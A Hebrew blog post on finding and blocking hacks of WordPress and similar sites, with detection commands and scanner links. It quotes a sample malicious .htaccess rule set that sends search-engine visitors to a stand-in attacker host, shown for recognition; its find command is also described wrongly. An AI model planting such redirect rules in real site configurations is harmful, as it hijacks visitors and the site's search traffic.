website-hacked

בימים שבהם כבר נהיה מנהג לתקוף אתרים של ישראליים , בראשם עומדים אתרים שאינם מוגנים ומתוחזקים באופן סדיר ובמיוחד אתרים המבוססים על קוד פתוח כגון וורדפרס וג'ומלה וכן גם דרופל שיחסית קל למצוא במערכות הללו פרצות ובתוספים שלהם מאחר והם משוחררים כקוד פתוח הנראה לעיני כל המעוניין בכך.

במאמר זה אני הולך להסביר לכם –

  • מאיפה בדרך כלל הפורצים מנסים להכנס? – איתר הפריצה.
  • איך לאתר פרצות אבטחה ע"י כלים מתקדמים
  • איך לחסום מתקפות על האתר שלכם – תוספים מומלצים ודרכים לשיפור אבטחה
  • ביצוע פעולות מנע , ברמת האתר בכדי לחסום פריצות עתידיות

אני קודם כל אפתח ויגיד כל מה שכל מתכנת שמכבד את עצמו יגיד על אבטחת אתרי וורדפרס וכל איש אבטחת מידע ישים על זה דגש , יש לדאוג לעדכונים רציפים של וורדפרס , ועדיף היום ולא מחרתיים מאחר משתמשים שעושים שדרוג לאחר זמן רב שלא שדרגו בדרך כלל יתקלו בבעיות שיצופו , בין היתר חוסר התאמת תבנית או התנגשות בין פלאגינים שבעיות אלו יכלו לצוף תוך כדי תיקון האתר ולא בפעם אחת.

אלו הדרכים שבדרך כלל משאירות לפורצים דלת פתוחה לרווחה לכניסה למערכת שלכם

  • דלת אחורית בתבנית פלאגין (Backdoor)
  • אפשרות להעלאת קבצים דרך פלאגין שאינו עדכני (למשל הייתה פירצה כזו בFCKEditor בעבר)
  • ססמה חלשה לניהול הוורדפרס (נפוץ כל כך , אתם לא היחידים שמשתמשים ב1234567)

אם כך אנחנו נתמקד בשתי הבעיות הראשונית כי אני באמת מקווה שהשלישי לא קיים אצלכם (גם לא בצורה מספר הטלפון או הת.ז שלכם , או בכלל ססמה שאתם משתמשים בה גם לשימושים אחרים).

דלת אחורית בתבנית או בפלאגין

במקרה כזה קודם כל יש להניח שאת הפלאגינים והתבניות שלכם אתם מורידים ממקומות אמינים ולא ממקורות בלתי חוקיים כמו הורדות דרך טורנט (אוי ואבוי!).

אבל אם לא , אנחנו בכל זאת אנשים סלחניים ולכן יש באפשרותכם לשדרג את הפלאגין או לסרוק את הקוד.
במידה ויש לכם גישה למערכת ההפעלה (SSH) זה עשוי להיות פשוט יחסית ולקחת מעט זמן , אם לא אני מציע להוריד את הקבצים למחשב שלכם ולחפש בקבצי הPHP בלבד את המחרוזות החשודות.

1) חפשו את הפונקציה – base64_decode , פורצים רבים נוטים להשתמש בה מאחר וניתן להסתיר פקודות זדוניות ואז לפענח אותן באמצעות הפונקציה הזו , אם אתם רוצים כשאתם מחוברים למכונה –

grep -r "base64_decode" * /home/your_dir/

2) חפשו באמצעות סורק חיצוני קוד JS זדוני שהושתל באתר שלכם (בדרך כלל בתבנית) חפשו באמצעות מנוע חיצוני –
https://sitecheck.sucuri.net/
במידה והמנוע מצא קוד זדוני באתר אתם מוזמנים להשתמש בפקודה שרשמתי למעלה (grep) או בעורך האהוב עליכם ולחפש חלקים מהקוד.

העלאת קבצים באמצעות פרצה בתוסף

ראשית , אני מקווה שאינכם מרשים לכל גולש להעלות אליכם קבצים , אלא אם זו מטרת האתר שלכם וגם אז יש להגביל את הגולש לתמונות בלבד וכו'.
הדרך למצוא קבצים ששונו או שהועלו לאחרונה היא בעצם הדרך למצוא פריצות , מלבד הLogs (קבצי תיעוד על כל פעולה באתר) שלעיתים מארחי האתרים לא אוהבים לחשוף.
ניתן לעשות זאת ע"י עיון ידני בקבצי הPHP בשרת ע"י הפקודה –

find -iname "*.php" -mtime +7

הפקודה בעצם תחפש לכם את כל קבצי הPHP שעברו שינוי בשבוע האחרון.

עוד אחד ששכחתי לציין

האמת שזאת גם מתקפה שכיחה , והיא נעשית ע"י אפשרות להעלאת קבצים , האפשרות הזו אינה פוגעת באתר שלכם ואתם תראו הכל כרגיל , אבל היא פוגעת קשות בתוצאות החיפוש שלכם ולעיתים גם בגולשים מהסלולאר.
המתקפה נעשית ע"י השתלה של קוד .htaccess שמפנה כל מי שמגיע ממנועי חיפוש לאתרים אחרים (בדרך כלל פרסומות של ויאגרה הימורים).
אותה אפשר גם לאתר ע"י חיפוש של קבצים חדשים או ע"י בדיקה של קבצי ה.htaccess אצלכם.
דוגמא לקוד .htaccess זדוני –


RewriteEngine On
ErrorDocument 404 http://some-maliciousSite.com/yyy.php[*]
* Note. The file name/type could be anything
RewriteCond %{HTTP_REFERER} .google. [OR]
RewriteCond %{HTTP_REFERER} .ask. [OR]
RewriteCond %{HTTP_REFERER} .yahoo. [OR]
RewriteCond %{HTTP_REFERER} .bing. [OR]
RewriteCond %{HTTP_REFERER} .dogpile. [OR]
RewriteCond %{HTTP_REFERER} .facebook. [OR]
RewriteCond %{HTTP_REFERER} .twitter. [OR]
RewriteCond %{HTTP_REFERER} .blog. [OR]
RewriteCond %{HTTP_COOKIE} !^._yyyy=yyyyy.$ (*** Present in some hacks)
RewriteCond %{HTTP_USER_AGENT} .Windows.$ [NC] (*** Present in some hacks)
RewriteRule ^(.*)$ http://some-maliciousSite.com/yyy.php [R=301,L]

לסיכום

אני יודע שקיימים עוד סיכונים נוספים במיוחד בצד השרת , הקפדה על ססמאות נאותות שנבנו ע"י password generator ממוחשב ימנעו צרות –
http://passwordsgenerator.net/

ואני משאיר קישורים נוספים לקריאה נוספת (אנגלית) –
בדיקה של קבצי .htaccess מפני פריצה
http://aw-snap.info/articles/check-htaccess.php

FAQ רשמי של וורדפרס "האתר שלי נפרץ" –
http://codex.wordpress.org/FAQ_My_site_was_hacked

רוצים ללמוד עוד על וורדפרס? רוצים מתכנת וורדפרס , מוזמנים לפנות אלי בטופס צור קשר שבאתר.

אתם מוזמנים גם לשלוח הערות לשיפור תיקון במאמר 🙂

UP